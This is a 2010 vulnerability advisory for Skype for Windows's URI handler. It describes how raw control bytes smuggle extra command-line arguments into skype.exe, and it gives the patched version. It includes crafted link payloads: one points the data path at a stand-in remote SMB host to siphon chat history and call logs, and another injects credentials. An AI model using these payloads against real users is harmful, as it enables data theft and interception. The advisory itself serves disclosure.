Date released: March 11, 2010
Affected software: Skype for Windows: All releases prior to v4.2.0.1.55 (v4.2 hotfix #1)
Provided and/or discovered by:
Paul Craig, Security-Assessment.com Ltd.
Independently reported by Anonymous via ZDI.
Description
The Windows Skype client version implements two URI handlers, Skype: and Skype-Plugins. Both URI handlers allow for easy browser desegregation and are supported by all modern browsers. When a Skype link is clicked, the skype.exe process is spawned with the /URI: command argument, followed by the user-specified phone number or contact name.
For example:clicking the link: Skype:PaulCraig will spawn the process Skype.exe “/URI:Skype:paulcraig“
Due to a flaw in the current user input validation performed by Skype, it is possible to append additional command line arguments which are subsequently processed when Skype is launched.
A remote user is capable of crafting a link that—when clicked—will spawn skype.exe on a client using a Datapath location which is present on a remote SMB share. The Skype client will load any configuration or security policy present and save the users Skype account information to the remote share.
This allows a remote user to control the Skype configuration and security policy of the local client instance of Skype. Settings such as a remote proxy can be defined, which could be used to Man In the Middle Skype communications.
Exploitation
Successful exploitation requires that a Skype user is tricked into clicking a specially crafted "skype:" URI and may also depend on the browser being used. Internet Explorer 6, 7, or 8 and Chrome are reported as possible vectors.
The use of a raw binary byte is permitted by Skype, and the byte is subsequently treated as a whitespace value when parsing Skype.exe command line arguments. This provides a whitespace character, without being a traditional whitespace. This method of whitespace character injection can be used to include additional command line arguments to the Skype.exe process.
The example below illustrates this:
<a href=skype:A"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>Click Me</a>
where 0x01 represents the RAW binary byte value 0x01.
This URL will retrieve the Skype configuration from the remote host ‘remotehost’. Once a user has authenticated using Skype, the Skype client will download their chat history and call logs to the remote share.
Other arguments such as /username and /password can also be included using the same method of whitespace injection. This is illustrated below:
<a href=skype:A"0x01/secondary0x01/username:"test”0x01/password:”test>Click Me</a>
The bytes 0x01-0x07 were found to function as a replacement for a whitespace character.
Solution
Skype has created a fix for this vulnerability, which has been included as a part of Skype v4.2 hotfix #1. Update the latest version of Skype. For more information on the new release of Skype, please refer to the release notes:
http://share.skype.com/sites/garage/2010/03/10/ReleaseNotes_4.2.0.155.pdf
References
http://secunia.com/advisories/38908/
http://www.security-assessment.com/
Add comment
If you find the content of this comment offensive, you can report it and our crew will have a look at it
Comments